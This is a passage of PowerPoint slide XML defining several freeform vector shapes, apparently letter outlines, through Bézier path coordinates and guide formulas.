                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="187"/>
                    <a:pt x="157" y="187"/>
                    <a:pt x="150" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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8" name="Freeform 159">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D7DCEC5-F65D-48B2-8EF6-3E79326E0F0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId55"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3470275" y="1422400"/>
              <a:ext cx="71438" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 110 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 120 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 110 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 49 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="120"/>
                    <a:pt x="17" y="120"/>
                    <a:pt x="25" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="274"/>
                    <a:pt x="175" y="274"/>
                    <a:pt x="168" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="110"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="38"/>
                    <a:pt x="77" y="49"/>
                    <a:pt x="91" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="49"/>
                    <a:pt x="115" y="38"/>
                    <a:pt x="115"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69" name="Freeform 160">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A638B87-C042-492B-AEC6-538B1B28ED1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId56"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3557587" y="1457325"/>
              <a:ext cx="92075" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 86 h 328"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 30 h 328"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 328"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 190 h 328"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 328"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 86 h 328"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 195 h 328"/>
                <a:gd name="T14" fmla="*/ 134 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 328"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 110 h 328"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 328"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 24 h 328"/>
                <a:gd name="T22" fmla="*/ 57 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 328"/>
                <a:gd name="T24" fmla="*/ 20 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 328"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 18 h 328"/>
                <a:gd name="T28" fmla="*/ 20 w 237"/>
                <a:gd name="T29" fmla="*/ 33 h 328"/>
                <a:gd name="T30" fmla="*/ 42 w 237"/>
                <a:gd name="T31" fmla="*/ 33 h 328"/>
                <a:gd name="T32" fmla="*/ 42 w 237"/>
                <a:gd name="T33" fmla="*/ 298 h 328"/>
                <a:gd name="T34" fmla="*/ 20 w 237"/>
                <a:gd name="T35" fmla="*/ 298 h 328"/>
                <a:gd name="T36" fmla="*/ 0 w 237"/>
                <a:gd name="T37" fmla="*/ 314 h 328"/>
                <a:gd name="T38" fmla="*/ 20 w 237"/>
                <a:gd name="T39" fmla="*/ 328 h 328"/>
                <a:gd name="T40" fmla="*/ 99 w 237"/>
                <a:gd name="T41" fmla="*/ 328 h 328"/>
                <a:gd name="T42" fmla="*/ 119 w 237"/>
                <a:gd name="T43" fmla="*/ 314 h 328"/>
                <a:gd name="T44" fmla="*/ 99 w 237"/>
                <a:gd name="T45" fmla="*/ 298 h 328"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 298 h 328"/>
                <a:gd name="T48" fmla="*/ 77 w 237"/>
                <a:gd name="T49" fmla="*/ 19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7" h="328">
                  <a:moveTo>
                    <a:pt x="77" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="57"/>
                    <a:pt x="106" y="30"/>
                    <a:pt x="137" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="30"/>
                    <a:pt x="203" y="67"/>
                    <a:pt x="203" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="158"/>
                    <a:pt x="168" y="190"/>
                    <a:pt x="133" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="190"/>
                    <a:pt x="77" y="146"/>
                    <a:pt x="77" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="86"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="195"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="216"/>
                    <a:pt x="119" y="221"/>
                    <a:pt x="134" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="173"/>
                    <a:pt x="237" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="49"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="140" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="94" y="9"/>
                    <a:pt x="77" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="13" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="298"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="298"/>
                    <a:pt x="0" y="298"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="328"/>
                    <a:pt x="13" y="328"/>
                    <a:pt x="20" y="328"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="328"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="328"/>
                    <a:pt x="119" y="328"/>
                    <a:pt x="119" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="298"/>
                    <a:pt x="107" y="298"/>
                    <a:pt x="99" y="298"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="19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0" name="Freeform 161">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{517DA9D9-D68A-4CBF-BF15-7E6479D9F199}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId57"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3660775" y="1433513"/>
              <a:ext cx="82550" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 91 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 91 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 76 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 76 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 91 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 91 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 193 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 212 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 211"/>
                <a:gd name="T37" fmla="*/ 248 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>
                <a:gd name="T41" fmla="*/ 9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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="91"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="91"/>
                    <a:pt x="200" y="91"/>
                    <a:pt x="200" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="10"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="91"/>
                    <a:pt x="13" y="91"/>
                    <a:pt x="20" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="257"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="193"/>
                    <a:pt x="194" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="193"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="243"/>
                    <a:pt x="148" y="248"/>
                    <a:pt x="137" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="248"/>
                    <a:pt x="98" y="222"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="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1" name="Freeform 162">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B23370-76B7-4E5B-9101-E353741CD638}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId58"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3759200" y="1457325"/>
              <a:ext cx="96838" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 173 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 193 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 229 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 199 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 184 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 249"/>
                <a:gd name="T11" fmla="*/ 184 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 249"/>
                <a:gd name="T13" fmla="*/ 20 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 151 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 15 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 30 h 218"/>
                <a:gd name="T22" fmla="*/ 173 w 249"/>
                <a:gd name="T23" fmla="*/ 30 h 218"/>
                <a:gd name="T24" fmla="*/ 173 w 249"/>
                <a:gd name="T25" fmla="*/ 136 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 77 w 249"/>
                <a:gd name="T31" fmla="*/ 20 h 218"/>
                <a:gd name="T32" fmla="*/ 57 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 21 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 15 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 30 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 30 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 173 w 249"/>
                <a:gd name="T47" fmla="*/ 19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9" h="218">
                  <a:moveTo>
                    <a:pt x="173" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="184" y="215"/>
                    <a:pt x="193" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="215"/>
                    <a:pt x="249" y="215"/>
                    <a:pt x="249" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="184"/>
                    <a:pt x="236" y="184"/>
                    <a:pt x="229" y="184"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="30"/>
                    <a:pt x="143" y="30"/>
                    <a:pt x="150" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="181"/>
                    <a:pt x="132" y="187"/>
                    <a:pt x="116" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="187"/>
                    <a:pt x="77" y="171"/>
                    <a:pt x="77" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="77" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="173" y="19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2" name="Freeform 163">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{676A5DC7-FDB0-4A84-9035-FF1870F57B39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId59"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3873500" y="1422400"/>
              <a:ext cx="71438" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 110 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 120 h 305"/>
                <a:gd name="T10" fmla="*/ 80 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 80 w 188"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 110 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 49 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="120"/>
                    <a:pt x="16" y="120"/>
                    <a:pt x="24" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="12" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="274"/>
                    <a:pt x="175" y="274"/>
                    <a:pt x="167" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="110"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
